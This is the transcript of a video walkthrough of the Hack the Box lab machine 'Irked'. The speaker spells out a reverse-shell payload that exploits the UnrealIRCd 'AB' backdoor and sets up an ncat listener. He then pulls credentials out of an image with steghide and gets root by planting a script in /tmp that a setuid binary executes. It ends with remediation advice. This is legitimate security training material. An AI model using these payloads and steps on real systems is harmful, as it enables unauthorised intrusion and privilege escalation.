What up, what up, what up? This is Toby with O-Line Security, and we are back with another machine from Hack the Box. All right, this time we are dealing with a machine called Irked. Okay, Irked was a pretty simple and straightforward machine, especially for me since it's my first time in almost a month. So if I've hacked anything, right, you could tell based on the last time we posted a Hack the Box video. Just personally been developing a lot of code, automating a lot of services, creating some applications. But nonetheless, we are back. All right, let's get right into it. Irked was a pretty straightforward machine, as I stated, pretty simple, a little bit of hiccups here and there if you're not familiar with certain services like IRC. So the first thing we did, obviously, I've already done everything, right? I've already popped the box. So I'm not gonna run certain commands again, like the Nmap scans that we did. Right, we got a few ports back over here. Port 22 SSH, port 80 web services, 111 binding some type of service, some type of RPC service, 6697, 8067, and some other ports. Right, so the first thing we did was the easiest thing to do. Check out what's on port 80. So let's go over here first. And what's the IP address? 10.10.10.117. Let's see what's over here. Nothing really much going on over here besides this picture, maybe an emoji. IRC is almost working. What we did do here though, right, obviously you want to look back at the source, see if there's anything interesting. Nothing really besides this image. So what I did was just save it, right? You never know when you're gonna need it. I'll just save it as index.jpg. So we have it saved. Let's make sure. Okay, because we will need it. But when I was going through this box, I didn't know if I was going to need it or not. All right, so we have that saved. So next thing we're going to check out is what the heck are these two services right here, right? We know what 22 is, but I don't have any SSH keys or SSH credentials. So what the heck is 6697, 8067? Simple, quick Google search will show you those are default IRC ports. Let's do 6697. Yeah, I literally copied and pasted the Nmap results, as you can see. To learn that it's IRC, looked at all these cool little blogs. I think there was one more. Yeah, there was another one I looked at. I looked at a bunch of different things. The one that I actually used though to help me get my first shot, because I tried this, I tried this. This command didn't work for me though. This right here. But the one that before I get into that, all right, we see those ports. We know what these services are now, right? They're for IRC. These are default services that IRC uses. If you're not familiar with IRC, Internet Relay Chat, it's just like a instant messaging type of thing. Send messages back and forth. Okay. Now, before we go any further, what I did try to do was see if suppose it's 6697. Tried to see if those ports gave, if we could connect to them. Yeah, 6697. Hold on. Too much. So, as you can see, it's trying to connect to some type of service. Obviously, the IRC service. I tried that right there. You also want to try it on the other port that they had, and now I can't remember the port number. What was it, like 8067? Okay, both of these, this one hangs on me. I think this one is gonna hang too, but nothing here, right? Just wait, closing. This is going to do the same thing. So played around with some more Googling, some more researching. I stumbled upon this blog or this article here, which talks about the backdoor in this service IRC. So there is a backdoor in this application, at least for this version that we're dealing with. It's taking a lot longer to time out than I wanted it to. At least for this version that we're dealing with. I just want to see something real quick that I didn't check last time. Yeah, it didn't show up here. But at least for this version that we're dealing with, there's a backdoor in this application where you're able to run system commands, right? If you prefix, so as I'm trying to connect to this, right? Let's remove one of these. As I'm trying to connect to this, if I prefix this command here with the strings AB, I could follow that up with some other type of command, like some, let's see, like bash-c bash-i, some command to connect back to me, right? But so essentially, this string, for some reason, it's weird. This blog talks about it a lot more. For some reason, this, I think it's this debug. This debug revolves into AB. But anyway, if you prefix your command, your whatever command that you're trying to pass over to this 1117 server with the strings AB, it'll allow you to run execute your commands from the system. Okay, so it will allow you to execute whatever comes before this from that system, which we're gonna go ahead and try and do. Please read this blog, it's pretty cool. Pretty basic vulnerability, which is kind of weird to me that it even exists. But it was exploited. So that is what we're going to do. All right, let me clear up some things. Okay, so that's what we're gonna do. We're just gonna go ahead and echo AB. I wish I didn't have to type this over. Bash-c. Bash-i. I got it somewhere. Let me see. Bash-i. Ampersand. Dev. TCP 10.10. 14. 4. Right, 10, 10, 14, 4, 1, 2, 3, 4 is the port we're gonna use. Redirect this over here, close that, and now we're gonna do our ncat 10, 10, 10, 117 over port 8067. The reason I'm gonna use 8067 was because when I use 6697, it just hangs on me. All right, this doesn't work. We could try it again in a second. But I'm gonna go ahead and run this. So what this is gonna do is prefix my command with AB so that we can run this right here from the system as we're trying to connect to that server. So for this to work, I need to sudo readline wrap ncat dash lvmpo 1, 2, 3, 4. So that's running, the netcat listener is running. It's gonna be waiting for this to get executed and call back home to us. Let's hit enter to see what that does. I probably should hit some verbosity so I can see what's going on in the background. But we'll let this run, and boom, we have access. Now what I wanna do is try to use the other port because it didn't work for me last time. 6697. Let's see if this does it. This didn't work for me last time, but I'm just curious. So, oh snap, it still worked. All right, sweet. Maybe there was something just going on with the box. All right, cool. So now we are on this box. All right, let's just get straight to it. Let's go back, see what's going on here. Who am I? We are IRCD. Where are we right now? We are under IRCD's home directory. Who else is under this home directory? We have an account called DJ Mardov. So let's go into DJ Mardov, see what's in there. Okay, he has some folders here. You can see the user.txt file, which we can't open. We don't have permission to, right? Permission denied. If we go into documents, right? Let's be real. When I first went through this, it's not like I knew exactly where to go, right? It took me a while. I think it took me like 30 to 45 minutes, no more than an hour to actually finish this box. I'm just going through it pretty fast right now because I've already went through it. So I don't want to make it seem like some type of wizard or something. So we're gonna go over to documents, right? There's something in documents that's pretty cool. You can see, all you see is the user.txt file. I wonder if I have permission to this. No, it's owned by root. Okay, so you need root to get all the flags here. I didn't know. I always try to go for root first. So if we do ls-al, the A is going to show you every file, including the hidden files. You get a backup file that's hidden. Right, let's open up that backup file to see what's in it. It says super elite steg backup password. Here's a password. If you're not familiar with what steg is short for steganography. steganography. So this is kind of implying that a password is hidden inside of some data, right? Like a picture. Steganography, you're hiding, concealing data inside of data. You're concealing something sensitive inside of a picture or a audio file, video, something, right? So this right here is implying that there's a password. There's some type of data that's concealed in a picture or something, right? It could be a video, it could be audio, but steganography started out with pictures. We do have a picture, right? So then there's a tool called Steghide. There are a bunch of different steganography tools. I ended up using Steghide that is going to allow us to see if there's some type of data behind that picture that we're looking at. So we have the index.ph, index.jpg. So if I run the Steghide command, here's a pretty cool example on how to run it. All right, so Steghide extract -sf. What does sf mean? All right, that's pointing towards the file name, and our file name is index.jpg. I'm gonna clear my screen here. Run this. It's asking for a passphrase, which we believe this is it. Up, down, up, down, down, left, right, back, whatever. So let's go ahead and try to extract that. I entered the password, and now the data was extracted to a file called pass.txt. Let's open up pass.txt. Looks like we have some credentials here. Don't know who these credentials are for, but guess what? We remember the box does have SSH open on it, right? And we do have an account that we can log into. Whose account? DJ Mardov. So what I'm gonna do is I don't need this session anymore. I'm gonna SSH into DJ Mardov at 10.10.10.117, and then we're gonna pass those credentials we just found any moment now. All right, back. All right, so let's go ahead and pass these credentials, and boom, we're logged in as DJ Mardov. Pretty cool, right? Pretty straightforward. Nothing really crazy going on here. Now there are a few ways you can go ahead and, does he have access? Yeah, he does. I'm not gonna read it though. So there are a few ways you can go ahead and try to escalate your privileges to root here. I tried to do all the manual enumeration. Kind of upset at myself that I had to use lint-enum to find the vulnerable service here, but we'll just go straight to it. There's a service called user bin view users here. You can see that the set UID, this S-bit is set here, so we can run it as the owner. If we run this thing here, and keep in mind, I found this using lint-enum, but there are a bunch of, as you all know, there are a bunch of binaries under user bin, right? I was kind of upset that I couldn't spot this without lint-enum because it was like it wasn't super obvious, but then again, I'm realizing how I missed it. It's just a lot of stuff here, and I was moving pretty fast. So if we run that user bin view user, you can see what it's doing. It's just listing out users. This application is being developed to set and test user permission. It is still being actively developed. Here's an unknown user. Here's the DJ Mardov we're logged in as. And you can see that it's trying to execute some type of bash file, right? That's under temp list users, and it's saying it's not found. Okay, you can, now, what I ended up doing was actually sending this file over to my computer. We're not gonna do that here because you don't need to do that. Ended up sending this binary to my computer using netcat, breaking it down, trying to see what was going on, what it was doing. Don't need to do that. You can, but obviously this is enough right here to exploit the machine, right? But when you do analyze this file, you can see that there are a few other vulnerabilities in this binary, right? In the script that it's using to execute. But yeah, that doesn't matter. So it's looking for this file, right? So let's go over to, oh, I took a screenshot. I must have hit some type of hotkey or something, I don't know. So let's go over to that directory, temp. There is no list users file here. If we give it a list users file, wait, what was it called? I think it was list user without an S. Oh, with S. So if we just go ahead and nano list users, bin bash, because it was a shell script, a bash script, bin bash, and let's just write bin bash, right? So we can execute this bin bash. All right, that should be it, right? Because it's looking for that file. We've given it the file here, list users, cat list users. All we got to do is run bin, user bin view user. Permission denied. Oh, we have to change the permissions on list users. Make it an executable. It tried to run it. It said, hey, I can't run it. Let's go ahead and try it again. And boom, we are root, right? We are now root. And that was it, y'all. It was a pretty straightforward box, pretty simple, pretty fun. Got through it a lot quicker than I thought we would get through it. But hey, if you like this video, if you like the content that we're putting out there, please do me a favor and smash the like button. It means a lot to me. It means a lot to the organization. Also, don't forget to subscribe for future hacking content, developing content, security content, including security plus content. Before we leave, AAR, after action report, lessons learned, whatever you like to call it, tabletop, I don't care. How are we going to prevent this from happening in the future? Obviously, how do we exploit this the first time? What do we abuse? Oh yeah, this IRC backdoor. They shouldn't be using this. There's a better version. It talks about it in this article here. I'll put it in the video description. But it talks about a better version that is being used and how it's, there's some signatures and certificates being implemented to ensure that communication back and forth is secure. So you either want to get rid of this IRC that we have here, or upgrade it, right? Upgrade it to something more secure. After that, obviously you don't want to have this picture publicly available, right? If you're gonna do the cool steganography and hide sensitive information behind a picture, don't make that picture publicly available. And we want to definitely lock down. This script needs to be peer reviewed. This binary, right? There are not a lot, but like 2 or 3 bugs that I saw in the script that could be exploited. It's not using absolute paths, so you can actually just call different commands from different locations on this box. But you want to lock down what this script is using, right? Like the list users file we just manipulated. That should not be possible. That file should be locked down. Tight access controls. If it's not locked down, the script shouldn't be calling it, right? It shouldn't be calling something that it doesn't exist. Other than that, y'all, I think that's it. Please let me know if there's some other videos that you want us to see. If there's a particular box that you want us to hack, don't forget to like and subscribe, and I'll see you all next time. Peace.